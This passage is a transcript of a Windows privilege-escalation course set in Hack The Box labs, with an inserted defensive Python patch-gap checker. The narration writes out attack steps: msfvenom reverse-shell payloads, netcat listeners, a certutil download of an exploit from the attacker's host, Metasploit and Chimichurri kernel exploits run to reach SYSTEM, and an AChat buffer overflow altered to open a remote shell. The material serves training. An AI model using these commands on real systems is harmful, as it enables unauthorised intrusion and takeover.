doesn't hurt; there's nothing malicious going on, it's just doing checks. I'll show you one against mine that I ran for winPEAS, because winPEAS isn't going to work on the box that we're doing, but I really do love winPEAS. Another one from rasta-mouse is Watson. Watson's just another great tool, updated to include, you can see, 2019 vulnerabilities, so more updated than Sherlock, and Sherlock is now deprecated. The only issue that I have with Watson is it comes in an .sln file, meaning Visual Studio, and meaning we have to compile it and we have to know the .NET version running on the machine, so it makes it a little bit more difficult to run this. Not that it's not a great tool, it's just a little more difficult. PowerUp, which we're actually going to focus on in this course, is a great, great tool. You're going to see this come up again; even though it's not going to come up right now in this section, you're going to see some of these tools come up again as we enumerate other boxes, so just because you don't get to use them right now, don't fret, you're going to see them over and over again. Another one coming up is JAWS, just another Windows enumeration script, also runs in PowerShell, does a lot of the same thing. I'm skipping ahead just a little bit, going a little fast here, because I want to talk about this one here. Now, windows-exploit-suggester.py is a great tool, so let me scroll down just a little bit and show you the usage. You can see that we just update the database that it has, so it has a database that's out there that it pulls down; if there are any dependencies we'll install those, but we use the systeminfo. All we do is do a systeminfo, grab that, put it into a text file, and then it goes in here and it checks things for vulnerabilities and it tells us, hey, it might be vulnerable to this, this or this. I mean, that's great; it's just another vulnerability checker, something that we can use to check ourselves, and
the last one I've got here is Seatbelt. Seatbelt is another .sln file, meaning you have to compile it. So if we go back into our little PowerPoint presentation, the only one we didn't cover is the exploit suggester from Metasploit, very similar to what the rest of these do, it's just running off Metasploit, and we'll see how that works. We'll see how the Windows Exploit Suggester works here very, very shortly, so again, don't fret if you don't see all these right now. I'm going to pull up really quick also, this is just a winPEAS I ran on my machine as a non-privileged user, so we've got an account here as my wife, and we're just going to say, hey, here's a non-privileged account. I'm not going to show you everything, I'm just going to show you some of the cool stuff. So it's in color, it's nice and neat, and it shows you, hey, here's the legend: if it's red, something is misconfigured, or if it's green, it's well configured. And then it's got the different things here, and it says we're looking for information on this computer. Here it is, it's a Windows 10 machine; here's your systeminfo, right, Windows 10, here's the hostname, here's the architecture, here are the hotfixes. So remember the wmic qfe; it's pulling that for you and it's saying, hey, you're bad, you haven't updated this in a little bit. And we're actually running Watson from rasta-mouse, so you just saw that tool came through here, and it's got a couple of potential vulnerabilities that could allow for escalation. It says, hey, what are the PowerShell settings? These are important to know, especially if you're going to run any sort of PowerShell-type vulnerabilities against the machine; it's good to know if you're on version 2, if that's enabled, if version 5 is enabled, or if you're only on version 5 or version 2.
Come through here, you see more information: what protections are on, any cached credentials, what the user environment variables are. These are all really good. Let's scroll down just a little bit: drive information, you can see what drives are attached to this machine; what AV information is here. So all the things we've covered, right, are just in here: UAC status, users information, where they have access, and then it just goes all through this. So current token privileges, which we're going to cover later; if there's any clipboard text; who the logged-in users are; who the RDP sessions are. So this is really, really nice. I won't go through the whole thing; I will scroll down to the bottom. So here, Windows credentials: it looks for all different kinds of credentials, and it's been doing this in password files and other things, but look, it's looking in the Windows Vault, Credential Manager, are there any credentials anywhere that we can find? And this is kind of what I was telling you, like, hey, we're going to look for things in the credentials, looking for saved Wi-Fi, all the things we just talked about a few minutes ago; here it is checking that. It's checking for browser information, any sort of thing; it looks like there may be some saved logins in the cookies for Chrome, so maybe there's a vulnerability there. So these are all the things it looks at; it looks at processes. There's so much that I kind of skipped over here, but I want you to just run this on your own: go download it, run it on your own. If you need help getting to the executable, I can show you where that's at too before we take off here. If you see the winPEAS, there's the .bat file and the winPEAS .exe; if you click on it, now you see there's an .sln here, but don't worry about that, they actually do provide the executable. So if you click on winPEAS right here and you click on bin, you're always looking for bin, x64 or x86 depending on your architecture, and then we're going to go
ahead and click on x64, because that's what most of us are on, you download the winPEAS.exe and you just run it. So it's as easy as that. It stays up to date; look, the last commit was seven days ago, so that's awesome. So you just want to make sure that you run this; it's not going to do any damage to your computer. I would recommend running it as a low-privilege user; if you run it as a high-privilege user you're going to see all kinds of Christmas tree colors going off in your scan, so I would run it as a lower-privilege user. But in the next video, what we're going to do is try to use a couple of these tools; you're going to see them fail, and then we're going to use a couple of tools that actually work for us, and it's just going to prove the concept that you can't know about too many tools, and you should have a wide array of tools in your tool belt. So we're going to see all about that in the next video, and we're going to do a little bit more enumeration and get towards popping our first shell, or popping our first privesc, in this course. So I will catch you over in the next video.

All right, for the first half of the video I kind of just want you to watch, and then when we get into the second half of the video you can go ahead and partake in what I'm going to be showing you. So the one thing I do want you to do is go ahead, if you're in a Meterpreter shell, change your directory to C:\Windows\Temp, and make sure you do your escaping like this. I've gone ahead and downloaded a couple of different tools; one tool that I've downloaded is winPEAS, so I'm going to go ahead and upload winPEAS, and all I'm going to say is upload, and I just lost my shell. So let me go ahead and run that really quick and re-pop the shell, and we're going to upload it. Let's see the present working directory; let me change it one more time, so Windows\Temp. And what we're going to do is we're going to upload; I've got it in root
Downloads, and then I've got winPEAS here, the .exe, okay, and this is the x86 version. So then I'm just going to drop into a shell and I'm going to try to run this, and I'm going to go ahead and just say winPEAS.exe, and nothing happens. Why is nothing happening? Because it's likely that we do not have .NET 4.0 or greater, so we're likely encountering an error. Nothing is happening here; we don't see all the pretty colors or anything that we saw before. All right, that's fine. Well, what about a tool like PowerUp? I could probably run PowerUp; let me see if I can get into a PowerShell real quick. So I'll do powershell -ExecutionPolicy Bypass, and then it just hangs. So I can type a command, whoami, anything, and nothing's going to happen here. So we see sometimes in shells like this where this just hangs. That's fine. Okay, well, maybe I can go back, and in Meterpreter they have a load powershell feature, so I can load PowerShell, load the PowerUp file that I have and just give it a go that way. Well, I tried a little PowerShell and look what happens to me: it kills my Meterpreter session. Well, that's not very nice, so now I've got to go get another Meterpreter session. So what we're up against here is we don't have the capability to run an executable, we don't have the capability to run an interpreter or PowerShell, so we're going to have to get creative. There are other tools out there; I just showed you four different ways to do this. So the first thing we're going to do is get our shell back, and then we're going to run the post-exploitation module from Metasploit that is a suggester. So we're just going to type right in here, we're going to say run post, and we can autocomplete this, and then we just say post/multi/recon/local_exploit_suggester, and it's going to collect all the data from this box, potential exploits here. I'm going to open up a text editor because I'm going to save this out, and I'm actually going to open up a
couple of tabs, because there are a couple of things I want to do. We're also going to drop into this box and we're going to grab systeminfo. So while this is running, what I want you to do is also come into here, and I want you to come into the AonCyberLabs repo here, and so this is the windows-exploit-suggester.py. Go ahead and download this; if you need to, just go to Google, go to GitHub, Windows Exploit Suggester; again, this was provided in the last video. Now, all we're going to do is just clone or download this; we're going to download the zip and we're going to open with, and in case I did not make it clear, make sure that you run this as well. So now we're hands on, we're doing other checks, but you can see here, look at all the different things that it comes back with as potentially vulnerable. This is a lot, and these are all, for the most part, what are called kernel exploits, and we'll get to those in a little bit. So right now we're just collecting information, okay, we're just running our tools; we'll get to the kernel exploit portion in just a minute, but we have a lot of options, right, a lot of options here. What we're going to do is save these out; I just want to copy these, and then we'll also get information from our other tool. So we need to go into a shell and we just need to pull down systeminfo, like this, okay, just type in systeminfo. Go ahead and scroll up and copy everything and then paste it into a document, and you can just save that out. So go ahead and save this; it's going to ask you what you want to save it as, and we'll just call it sysinfo.txt, okay. We're also going to extract the zip that we have, so let's go ahead and extract the Windows Exploit Suggester into our root, and if we go to the GitHub again and scroll down a little bit, it says, hey, you need to run the windows-exploit-suggester.py with --update. So I'm just going to copy this; we're going to update the database. So let's open up a new tab and I'm going to
just do this: I'm going to cd to my root, or wherever you saved the file at, and I'm just going to paste this, so again --update. It says, hey, we've updated. Okay, what's the next step? It's going to say, hey, what's the database? So we need the database, whatever that database just was. We also need to install the dependencies, actually, so we're going to install python xlrd, which is going to be pip install xlrd --upgrade. So go ahead, copy and paste that. Now, you might have issues with pip being installed if you don't already have pip installed, so I'm going to go ahead and copy out a one-liner for you guys that I utilize to install pip. You might be able to use pip3, but just in case, here is that one-liner, okay, I'm pasting it here: it's going to be curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py. Now, I'll try running this; I've already got pip installed, so you're going to see that it says, hey, successfully installed pip. That's fine, it just overwrote it. So make sure you install that if you do have a pip issue on your machine; if you already have pip installed, that's great. And then we're also going to do the pip install xlrd --upgrade, okay. So now, from here, make sure you know what database you have, so we've got the .xlsx here, or the .xls, sorry. So we're going to say windows-exploit-suggester.py and we're going to follow the syntax that it has, so we need a --database, and then we're going to say, let's see if it saved it out here, 2020, it did. And we also need to know the --systeminfo, so we're going to say --systeminfo and we'll say sysinfo.txt, just like this. So go ahead and run this, and it's going to go and try to collect this and see what vulnerabilities are out there that might exist. And the nice thing is it updates; look, we have an updated database here, and
we know exactly what we're up against so even more modern updates or more modern exploits may fall into here so it identified Windows 7 32-bit and you can see that it came up with some vulnerabilities for us to try as well so we have different vulnerabilities we can look up these different ms010 or one zero zero one five for example or zero forty seven and see what's in here and you can see a lot of these say hey Windows kernel Windows kernel Windows kernel well that's a little bit of foreshadowing we're going to get there here in just a second so here's the takeaway let's let's take away in a big summary there are a million tools that you can use out there win peace is probably my favorite because it's just an executable that you can go out there and run but as you saw when piece doesn't work all the time okay maybe we need to try something like power up power-up's a great tool as well I would use windp user power up first if you can't get Powershell if you can't get the executable to work okay there's still options if you're in an environment where you don't have medicine you can't use Metasploit then you don't use meta's blade you don't have the suggestor that's okay there's this suggestor you run system info you pull it down you get this there may be roadblocks there's there's okay there's always going to be roadblocks if Windows priv ask any prevask is very difficult and a lot of the times they make it intentionally difficult they put in intentional roadblock so make sure that you know there's other options there's always other paths this box is vulnerable it's meant to be exploited you're gonna figure it out so the big takeaway know your tools have good notes again as always have good notes write this stuff down notate all the tools go play with them play with them now put them in a lab environment try them on your computer do whatever you need to do but play with these tools understand what they do why they're doing what they're doing okay so take advantage 
of your time; there's no need to rush through this. Go play with these tools, run them on Hack The Box, run them on anything, run them on a CTF, run them at home, figure out what they do and utilize them. Now, in the next section we're going to start working on our exploits; we're going to start talking about kernel exploitation and kind of just go from there. So we're starting to get into all the privilege escalation tactics, we're out of the enumeration portion, and I'm ready, because we're about to start firing through all kinds of boxes and learning different tips and tricks, and it's really exciting. So I'm excited to see you over in the next video when we root this box a couple of different ways, and then we'll move on to the next one and keep going from there. I'll catch you over in the next section.

All right, let's get to exploiting. The first exploits we're going to learn about are called kernel exploits, so here's a quick overview of what a kernel exploit is. What is a kernel? Well, a kernel is a computer program that controls everything in the system, and if you see my source at the top, am I quoting Wikipedia? Yes I am; I'm that confident in Wikipedia. So it is a computer program, and it facilitates the interactions between hardware and software components. If you see here in the little graph, we have the kernel, which lives in between the applications and feeds interaction between the CPU, memory, and devices. It is a translator, so think about it as a translator. Look at this next picture; this is more related to Windows, so you can see here is the kernel, here is the user interaction, here's the Windows API, etc. We have our operating system kernel here, all the way down to the hardware. So the kernel itself is converting these input and output requests from software into instruction sets; it's putting them into these instruction sets and it's interacting in between these two objects. Okay, so it's an important feature, right, of the operating system; it is the core of the operating system, and at the core we can exploit. So that's what we're going to be taking advantage of: an exploitation of a kernel. Now, if you recall, we were looking at systeminfo, and systeminfo was telling us, hey, what's the build of this operating system, what version are we on, what operating system are we on, etc. We want to know that because there are certain kernel exploits related to specific builds, so whatever the build was at that time, there are kernel exploits available for it. To give you an idea as to how many kernel exploits there have been, there is a GitHub out there, and I will provide this as well as a resource, that's called windows-kernel-exploits. Let me just kind of scroll through. All right, so you can see that we have 2017 and 2018, but it starts with MS03 and goes all the way down to MS17, and MS17-010 was one of the very, very big ones. So it has all the links here for all the different kernel exploits; there's a lot, right, there's absolutely a lot. And if we take advantage of this, if we own the kernel, we own the system, so that's what we're trying to do. If a regular user can perform this kernel exploit and successfully get the exploit, well then guess what, we are now SYSTEM, and that's what's going to happen here. So we're going to take advantage of a well-known kernel exploit and utilize that to elevate our privileges on the system. In the next video we'll take a look at the Metasploit method, then after that we'll do the manual method. I'll catch you over in the next video.

All right, are you ready for your first exploit? I'm super excited about this. So first we're going to start with Metasploit and just see the power of Metasploit and what it's capable of; after that we're going to shift off into the more manual exploitation. So remember, we ran the post/multi local exploit suggester and we got quite a few of these that came up. Now what's happening is it's saying, hey, I think that this machine is vulnerable to this bypassuac_eventvwr, this KiTrap0D, and this schelevator. Okay, and for me, from personal experience, the ones I like to target are some of the earlier ones; this KiTrap0D seems to always be a winner for me, though in this you might want to do a little bit more enumeration to make sure. But if you're in, like, a CTF or one of those environments, you can just kind of copy these and fire away and see if it works. I always recommend firing a couple of times, but we're going to go ahead and try this exploit a couple of times and see if it works for us. Now, if you're interested in learning more about KiTrap0D and why it's vulnerable, if you're into that nerdy stuff, which I know a lot of you are, here is a write-up on it from seclists.org; I will link this in the resources as well. So you can come in here and read exactly why it was vulnerable, what was happening, and then if we come into the affected software you can see that it affected all 32-bit versions of Windows NT, including Windows 2000, all the way through Windows 7.
So upon successful exploitation, the kernel stack is switched to an attacker-specified address. Okay, so let's go ahead and try running this. What we're going to do is background our session; mine is session 9, so just notate whatever you have. Then I'm going to say use and paste the exploit, exploit/windows/local/ms10_015_kitrap0d, say options, set my SESSION to 9, set my LHOST to tun0, and set my LPORT to 55555, because we exploited on 4444, so let's make it a different port here. Let's try running this and see what happens. Okay, it didn't work; let's do options and see what's going on. I see it still has my LHOST set back, so let me go ahead and set my LHOST one more time, back to tun0, and run this again. Okay, you can see it ran and we now have a meterpreter session. I actually lost my session in the middle of recording, so I went back; if you saw a little bit of video editing magic there, I went back, so session 10, and then session 11 is now this. If we say getuid we can see we are NT AUTHORITY\SYSTEM, and if we go into shell we can do the same thing and say whoami; you can see we're NT AUTHORITY\SYSTEM. We have now escalated this machine. So we took advantage of the post exploit suggester, we took a well-known kernel exploit, and we utilized it to elevate our privileges, and we did it all through meterpreter. Very, very powerful: we had a shell very easily, we had full control of this machine, very nice, very easy, and all we had to do was set a couple of parameters, run it, and guess what, we elevated the system very easily. So you're going to see some boxes like this when you're doing CTFs, capture the flag, Hack The Box, TryHackMe, whatever site you're on. If you are wanting the quick win and you can use Metasploit in your environment, this is a great one to utilize, very, very great one to utilize, one of the first things I'll try if I'm in an environment like that.
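The enumeration section above saves systeminfo output and feeds it to Windows Exploit Suggester, and the kernel overview notes that the build and the architecture decide which kernel bugs even apply. The defender's version of that step is a patch-gap check you can run yourself. The Python below is an added example, not code from the course or from Windows Exploit Suggester: it parses systeminfo text in the layout Windows prints, pulls out OS name, build, architecture and the installed KB list, and reports which required KBs are missing. The sample host, its hotfix list and the bulletin-to-KB mapping are constructed assumptions for illustration, not values captured from the course's box.

```python
import re
from dataclasses import dataclass, field

# Constructed `systeminfo` output (not captured from the course's box); the
# English field labels are what systeminfo prints on an en-US Windows 7 host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 LABHOST
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB977165
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Illustrative bulletin-to-KB mapping for Windows 7 SP1 x86. Assumption: the
# KB numbers are quoted from memory of the Microsoft bulletins; verify them
# against the bulletin pages before using this list for a real audit.
REQUIRED_KBS = {
    "KB977165": "MS10-015 (KiTrap0D, kernel privilege escalation)",
    "KB982799": "MS10-059 (Chimichurri, Tracing Feature for Services)",
    "KB4012212": "MS17-010 (SMBv1 remote code execution)",
}


@dataclass
class HostInfo:
    os_name: str = ""
    os_version: str = ""
    build: str = ""
    arch: str = ""
    hotfixes: list = field(default_factory=list)


# A top-level field starts at column 0; continuation lines are indented.
FIELD_RE = re.compile(r"^(?P<key>\S[^:]*?):\s+(?P<value>.*)$")
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text: str) -> HostInfo:
    """Pull OS name/version/build, architecture and installed KBs from systeminfo."""
    info = HostInfo()
    in_hotfix_block = False
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group("key").strip(), m.group("value").strip()
            in_hotfix_block = key.startswith("Hotfix")  # "[nn]: KBxxxx" lines follow
            if key == "OS Name":
                info.os_name = value
            elif key == "OS Version":
                info.os_version = value
                b = re.search(r"Build (\d+)", value)
                info.build = b.group(1) if b else ""
            elif key == "System Type":
                info.arch = value
        elif in_hotfix_block:
            h = HOTFIX_RE.search(line)
            if h:
                info.hotfixes.append(h.group(1))
    return info


def is_32bit(info: HostInfo) -> bool:
    """KiTrap0D-style bugs were 32-bit only, so the architecture field matters."""
    return info.arch.upper().startswith("X86")


def missing_patches(info: HostInfo, required: dict = REQUIRED_KBS) -> dict:
    """Return {KB: description} for every required KB absent from the host."""
    installed = set(info.hotfixes)
    return {kb: why for kb, why in required.items() if kb not in installed}


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{host.os_name} build {host.build} ({host.arch}); "
          f"{len(host.hotfixes)} hotfix(es) installed")
    for kb, why in missing_patches(host).items():
        print(f"  MISSING {kb}: {why}")
```

On a real host, `systeminfo > sysinfo.txt` gives you the input; a localized Windows prints translated field labels, so the key names in the parser would need adjusting there. The report only tells you a KB is absent; a later cumulative update can supersede an older KB, which is why the mapping should be checked against the current bulletin data before you trust a "missing" line.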
If you are trying to avoid using Metasploit, then we will cover in the next video how you can do this from a manual perspective, including getting the shell. We're going to completely go backwards: we're going to get a new shell in netcat and then elevate from there. So I'll catch you over in the next video when we do this all again manually.

All right, let's do this the manual way. Remember, we generated a payload with msfvenom and we utilized that to get a meterpreter shell; this time we're just going to utilize it to get a basic netcat shell. So what I'm going to do is say msfvenom with a payload of windows/shell_reverse_tcp, give it an LHOST of 10.10.14.5, which is my current LHOST at this time, and an LPORT; I'll just stick with 4444. Remember the file type, again, is aspx, because we're up against an IIS server, and I'm going to put this into something called manual.aspx and let that generate. At the same time, we're going to go over to this new tab and I'm just going to make a connection to the machine, 10.10.10.5, on FTP. Remember, we have anonymous login, so I'm going to log in and then just put the manual.aspx there. We can go to a new tab, and I'm just going to run nc -nvlp 4444, so we're setting up a listener on 4444 here. Then I'm going to go out to Firefox and just say, hey, 10.10.10.5/manual.aspx. Look at our connection, and hey, we've got a connection; we're not using my display whatsoever. So we do a quick whoami and you can see that we are the IIS AppPool user. Okay, so we know that this is a kernel exploit and we're going to take the alternate path. Now, I showed you how to run Windows Exploit Suggester; well, with Windows Exploit Suggester, when we ran that, what came back for us? Well, we've got a bunch of these different potential kernel exploits, we've got some Internet Explorer exploits; I wouldn't look at these. I would start right away with the kernel exploits and kind of work my way up from the bottom of the list. So we can go and just search for something like "MS10-015 exploit" and you're going to see what that actually brings up. We'll do "MS10-015 exploit" and it's going to bring up the windows-kernel-exploits SecWiki, so look at that. If we look at this one, guess what it is: it is KiTrap0D, the one we actually ran before. Now, we're not going to be able to actually run this one. If we take a look at the proof of concept, the proof of concept shows a shell spawning, and then we actually spawn a new command prompt utilizing the executable that they're giving; so they're providing this executable, it pops a new shell, and in that shell you're NT AUTHORITY\SYSTEM. We're not on a machine that is capable of getting a new shell; we're not on RDP or anything like that where we have a GUI interface, so we just kind of have to deal with the shell that we're given, which is just this basic shell here. So we need to pop something that can run inline on this shell, so that one's out of the question. We can start working our way up; we can look at MS10-047 and MS10-059. So if we go to 047 in this list, and I just like to look through this list because it has compiled exploits already, you see 047 doesn't exist but 059 does. So I'm going to click on 059 and there's just this Chimichurri.exe zip, and there's not really much on the readme; it shows you Chimichurri.exe and how to run this. Looks like you can run a cmd.exe and do a net user and add a user; that's one way of doing it. So what about we look this up, MS10-059, and see what exactly this is; I'll just type in "exploit", maybe there's more information on it somewhere. So Chimichurri is the other name for it, and this is a very well-known exploit as Chimichurri. We can look at the Exploit Database as well and just see what kind of information we can find about it, so we can look at a screenshot.png and see what they've got here. If you look at this, it runs Chimichurri and it says "this exploit gives you local system shell; usage is chimichurri IP address port", so then it says "ok, chimichurri.exe <IP> 8000", and then you open up a listener on the other end and establish a connection as well. So we'll take a look at how this is going to work. Let's see if this has any information on Chimichurri itself; it does not. So what it looks like we need to do is provide an IP address, which is hiding here, and tell it what port we want to connect back on, and it's just like a reverse shell. So we're going to go ahead and just give this one a try and see if this exploit works. If you want to do more research on it, you can absolutely go out to Google and just say "Chimichurri exploit" and see what information you can pull down; there's the MS09-012 as well for this one.

So what we're going to do is download this MS10-059 exploit. I'm just going to click on it, download it, save it, and it looks like it says "contains malware"; I'm going to go ahead and just hit open, which should store it on your computer, if you see that error. From here, I'm going to cd over to my Downloads folder and do a quick python -m SimpleHTTPServer; if you want to run it in Python 3 you can as well, remember that's python3 -m http.server. So now we're loading up our basic server, and we're going to go ahead and just make a simple GET request. Let's go to, maybe, cd .., well, cd .. one more time, and we'll just cd into Temp; let's see if we can write into Temp. So we'll do a certutil, and we're going to use this to transfer files; it's just like wget. We're going to say certutil -urlcache -f, and then http://10.10.14.5, whatever your IP address is, and then MS10-059.exe, I do believe, and I'll just call this ms.exe when I bring it over. Let's see if it actually gets that file; it's taking just a little bit here, and it looks like it has got the file successfully. So now if we do a quick dir, let's see if the file is in here; ms.exe does exist. So if we say ms.exe, it says "this exploit gives you a local system shell; usage: ms.exe IP address port". Okay, so I'm going to say ms.exe, my IP address is 10.10.14.5, and let's just call the port 5555. What I'll do is go ahead and open up another netcat on 5555, and then we're going to hit enter, cross our fingers, say whoami, and we are NT AUTHORITY\SYSTEM. I love kernel exploits, they're so easy.

So again, we had the ability here to look through, we lost it, there it is, to look through this Windows Exploit Suggester, and this is just another toolset, right? When we were doing our enumeration we didn't have the ability for the other tools, we didn't have the ability for any sort of PowerShell or any exe, so we utilized Metasploit and we utilized their suggester, and they have the ability to run KiTrap0D; we did not. So this easy one, KiTrap0D, is really nice in Metasploit, not so nice on its own, but we looked through the list and we found one that kind of works for us. I again like this windows-kernel-exploits SecWiki because you can just come through, it has it already compiled for you, and it's super easy to run against the machine. Usually they have a little bit more information than these, but the Chimichurri exploit has been around for quite some time, it's one that I'm very familiar with, and you'll see it come up again. So keep that in mind: if you see a box vulnerable to MS10-059, chances are you can probably run that exploit and give it a go. The worst thing that's going to happen is you try it and it doesn't work, and then you move on to the next one. But I would work my way up from the bottom of the list; you'll come up with your own sort of methodologies and familiarizations as you go. You can see most of these were Internet Explorer related anyway, but we're interested in anything that is kernel related that could have escalated privileges, so there were only a few options in total. So that's it for this lesson. We were able to take a completely Metasploit walkthrough and turn it into a completely manual walkthrough utilizing the same sort of toolsets. From here, what we're going to do is start looking at another escalation path, which is passwords, and it's going to be a pretty fun box. So we're going to move on, take a look at that escalation path, and take down another machine on Hack The Box. I'll see you over in the next section.

On to our next escalation path, which is passwords. Now remember, in the initial enumeration section we talked about password hunting; that's going to come into play here as a method of escalation. So my challenge to you is going to be to try to get an initial foothold on a machine just like we did before. This new machine that we're going to be looking at is called Chatterbox, so if you do a Ctrl+F and start typing in "chatter", you'll see Chatterbox is right here, and it lives at 10.10.10.74. My challenge to you is to go ahead and just hit play on this machine, go ahead and get it scanned, and then try to escalate it. If you get stuck, you can't escalate it, or you want to see the walkthrough, the next video is going to be the walkthrough on how to gain the initial foothold; the video after that will be the escalation using some sort of password mining. Now, I do have a hint for you. There are several guides that I provided in the beginning of this course; this guide here, as an example, could provide you the answer on how to get root within a quarter of the page. So we have the basic enumeration, we go into cleartext password hunting, and we go into what services are only available from the inside, and more importantly how to use plink. So those are some hints I'm dropping for you. So go ahead
and give Chatterbox a go. I want to see if you can push all the way through using only manual enumeration; we're not going to use any tools in this box, even in the walkthrough, no tools. So go ahead and try to do this all on your own from start to finish, and if you get stuck at any point, come check out the walkthrough; the answers will be there. I'll see you over in the next video as we gain an initial foothold on Chatterbox.

Okay, so let's look at our nmap scan. We don't have a lot here to go with: we have this AChat system, and then we have an AChat chat system here, looks like this is over HTTP, and then there's an AChat here. So the first thing we might do is something quick like searchsploit and say, hey, what's AChat. We can also, of course, go over to the actual exploit itself and see what's running, or we can go over to the web page itself and see what's running, but here we can see there is a remote buffer overflow; there is one in Metasploit and there's also a manual one, this 36025.py. So if we go ahead, we can copy it over from /usr/share/exploitdb, and then exploits/windows/remote/36025.py; again, if you don't see that path, the path is right here up top, and the rest of the path is right here. So I'm just going to copy that, and I'll just call it 3.py. We'll put this in our directory, and then if we go ahead and just gedit, or whatever your favorite editor is, and look at this, we can see the actual exploit itself. This is a buffer overflow exploit, and it looks like a very, very typical buffer overflow; they actually give us the msfvenom command here. Before we dive in and say, hey, we're for sure on this, we can make sure and go check out and see if there's any more information on this, just before going through all the trouble and firing away. So we might go out to Google and say something along the lines of "AChat exploit" and see what's out there. We've got this one here; we can open it up and see if it's any different. This is the 36025; it doesn't provide any information. Sometimes at the top it tells you, hey, this is a buffer overflow exploit and a little bit more information on that; I don't see anything here. Rapid7 does have something on it; we're going to avoid using Metasploit for this one, but it says this exploits a Unicode SEH buffer overflow in AChat; by sending a crafted message to default port 9256/udp it's possible to overwrite the SEH handler. This is running on Windows XP Service Pack 3 and Windows 7, which is what it has been tested on. So if we go back to our scan, let's see if it tells us anything about the OS guess: it's guessing Windows 8, some sort of Windows version, but it doesn't know exactly what it is, so there's nothing reliable there either. We don't have a lot to really go off of. We can also go over to the AChat itself, so if it is living on port 9255 we can go and look at that really quick and see what's there: we can just go to http://10.10.10.74:9255 and see if that takes us anywhere, which it doesn't look like it did. Try one more time, 10.10.10.74:9255, I'll copy that just in case, but it looks like it's not going anywhere for us. So we can't access the page; there's not much going on, even the site doesn't have a title, so it looks like there's nothing really there. We kind of just have to make a guess at this and see what we can figure out. So I'm going to go with the buffer overflow exploit and we'll see what we can do.

I've got it open in gedit now, and the thing that I see here is they have a platform of Windows, architecture x86, that's fine, but the payload is exec, which executes calc.exe. So whatever they're running, it just pops a calculator up, so it's not really what we want. But they have gone through, and if you're familiar with buffer overflows, it's gone through and just done the bad characters for us, which is really nice, so we don't have to worry about bad characters or any of this, and they give us a command, kind of. So what we can do is modify this command a little bit: we can just say windows/shell_reverse_tcp, and then instead of calc.exe we're going to take that out and we'll do LHOST equal to your IP address, so mine right now is 10.10.14.4, and then an LPORT; I'm just going to choose 443. The encoding and everything else is fine; we just want this to pop a reverse shell. So I'm going to copy this and go ahead and open up a new tab, I'll make this bigger for you guys, and just hit enter. This should generate some shellcode for us; so again, we're doing an architecture of x86, platform Windows, and then the windows/shell_reverse_tcp, so we're going to have to run netcat here in a second. Let's go ahead and copy this down and paste it in; I'm just going to replace what's in here. It's a little bit larger of code: they had 512 on the bytes, let's see what we ended up having, 774. So hopefully that doesn't mess with the address space; we should be okay, but we'll take a look at the end of this, and if it doesn't work maybe we'll have to adjust it. But if we come through here and scroll down, we've got to create a UDP socket, so we have to go over to the UDP address itself; we're going to navigate to 10.10.10.74.
and I'm going to go ahead and just save this out so this is going to make the connection it's going to do a little bit of this code and then it's going to inject the buff here for the code and do a little bit more advance of a buffer overflow this is a 32-bit SCH bypass so it's The Next Step Above if you have seen like the volume server exploits or something along those lines it's just the next step above that with the SCH bypassing so we're going to go ahead and just try to fire this one off so what we're going to do is we're going to run netcat here and we'll do nvlp of 443 and we're also going to just go ahead and try running python 3.pi now big caveat to this box and you may have run into some issues with it is that if you are not the first one to run this exploit against this and it doesn't work uh then there's a chance that somebody else has done it you only get one chance is what I'm trying to say you get one chance on this exploit so if it doesn't work you have to reset your box or if it works and you lose a shell or whatever you have to reset your box it's the only unfortunate thing about this one let's go ahead and run this see if we get any kind of shell we got a connect oh we got to connect from my machine let me turn this one off sorry and let's go ahead and run this one more time there we go so sorry I was trying out some exploits earlier from a Windows 7 machine so okay we got the connection here we ran it we're good to go so now if we say who am I you can see we are Chatterbox Alfred we are not system on this machine so we need to improve upon that all right so from here I'm gonna go ahead and hit pause and we're going to move on to the next step which is going to be the escalation so what we're going to do is we're going to escalate this machine again if you want to give it a go I have full faith at this point that you could do it again you can use this privilege escalation guide follow everything down to the point of this net stat with plink so if 
you can kind of piece it together look at the the netstat running on the machine look at the ports that are open and then hunt some passwords down since this is a password hunting section it's a little bit of a hint and see if you can figure it out and then I will catch you over in the next video when we walk through the rest of the steps all right so we've gained lower level privileges on this machine and now we're going to start doing some enumeration so we could do quickly first a system info and just see what we're up against you can see we've got the 2009 Microsoft Corporation copyright so it's telling me we're probably up against something like Windows 7 or even something earlier than that so what we're going to do is we're going to take a look real quick just take a peek and you can see we're up against a Microsoft Windows 7 host name of Chatterbox we got a service pack one on the build so that might be important if we're looking for something like a kernel exploit now you do have the benefit of knowing ahead of time what category we're in so we're actually looking for some sort of password exploit but we're going to continue on as if we don't know what we're doing so we're going to go ahead and look here for more information so we're going to notate down we've got Windows 7 Professional 6.1.72601 and then we've got service pack one that's great what are some other things we can look at well we can find a quick who am I see we are Alfred and we could say okay what about net users what users are on this machine well Alfred's on this machine and then there's administrator we can quickly check net user Alfred and see what kind of permissions we have and I'm more specifically interested in something like local group membership and you can see we're only in the users group so we're not in the administrators we're not an administrator so we don't have the right to escalate privileges here well that's fine we can keep looking around some other things that we want 
to look at are the IP information right so we want to do a quick ipconfig just see what's going on it looks like we've only got one IP address here we're not dual homed or anything like that we can do a netstat Dash ano take a look at that really quick too and this one actually proves to be interesting so looking at this one we see that we have an established connection here on 443 we see the two ports that were originally in the nmap scan this 9255-9256 the 139 I don't recall showing up but it's saying that it's available I didn't see it so I'm not sure if it just didn't show up in our scan or if it's hiding from us or what's going on however there is a few ports here or there are a few ports here that show up that are listening on the local address of 0.0.0.0 but they're not actually open and available to the outside these are internal ports one being 445. 445 being SMB now keep this in the back of your mind because 445 SMB that means that some sort of file share or way that we can connect but we can use a tool like PS exact or like win exe or something along those lines that can allow us to connect this machine with credentials now we don't know credentials of any user but say we got credentials somehow and that could be a little bit of foreshadowing maybe we can utilize this port to log into the machine so let's take a look further and let's go out to our Firefox and let's go to that privilege escalation guide let's kind of just do a quick run through we've looked at the who am I we've got system information we know the host name 